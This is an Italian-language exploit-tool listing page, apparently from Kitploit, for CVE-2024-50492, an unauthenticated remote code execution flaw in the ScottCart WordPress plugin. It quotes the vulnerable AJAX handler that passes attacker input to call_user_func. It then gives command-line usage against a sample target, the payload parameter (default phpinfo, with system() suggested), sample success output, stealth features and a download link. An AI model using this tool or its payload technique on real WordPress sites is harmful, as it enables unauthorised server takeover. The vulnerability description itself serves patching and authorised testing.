Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Esecuzione di codice remoto non autenticata | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-50492
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Esecuzione di codice remoto non autenticata

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2024-50492 - ScottCart <= 1.1 Exploit RCE

🔥 Script di exploit per ScottCart <= 1.1 - Esecuzione Remota di Codice non autenticata
🧑‍💻 Di Nxploit – Khaled Alenazi


📌 Descrizione

Il plugin ScottCart per WordPress (versioni ≤ 1.1) è vulnerabile a Esecuzione Remota di Codice (RCE).
Ciò consente ad attaccanti non autenticati di eseguire funzioni PHP arbitrarie sul server tramite un endpoint AJAX vulnerabile.

  • Plugin: ScottCart ≤ 1.1
  • Vulnerabilità: Iniezione di Funzioni non autenticata → RCE
  • CVE: CVE-2024-50492
  • Punteggio CVSS: 9.8 - Critico

🧠 Come funziona

Il plugin registra un'azione AJAX non protetta:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Che esegue:

root@kitploit:~
call_user_func($_POST['function']);

Permettendo agli attaccanti di chiamare qualsiasi funzione PHP esistente, come:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← se estesa in ambienti modificati

🚀 Caratteristiche dell'Exploit

  • ✅ Invia automaticamente un payload predisposto per attivare l'endpoint vulnerabile
  • ✅ Consente la sovrascrittura della funzione tramite argomento
  • ✅ Payload predefinito: phpinfo() per PoC
  • ✅ Salva l'output in un file con timestamp (es., results_2025-03-26_14-33-01.txt)
  • ✅ User-Agent personalizzato, gestione degli errori e ignoranza SSL per furtività

🖥️ Utilizzo

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Esecuzione Remota di Codice non autenticata
Di Nxploit Khaled Alenazi.

options:
  -h, --help            Mostra questo messaggio di aiuto ed esci
  -u URL, --url URL     URL di destinazione base (es., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Funzione da chiamare (default: phpinfo)

💡 Esempi

🔍 Comportamento predefinito (PoC con phpinfo()):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 Chiamata a funzione interna del plugin:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 Esempio di Output

root@kitploit:~
[+] URL di destinazione: http://192.168.100.74:888/wordpress
[+] Funzione payload: phpinfo
[*] Avvio exploit...
[+] Invio payload: function=phpinfo
[+] Exploit riuscito! Output:

PHP Version => 8.1.12
...

📁 E salvato in: results_2025-03-26_14-33-01.txt


🛡️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati.
Non utilizzarlo contro sistemi di cui non possiedi la proprietà o per i quali non hai esplicita autorizzazione al test.


💬 Crediti

  • 💻 Exploit di: Nxploit – Khaled Alenazi
  • 🛡️ ID CVE: CVE-2024-50492
Scarica lo strumento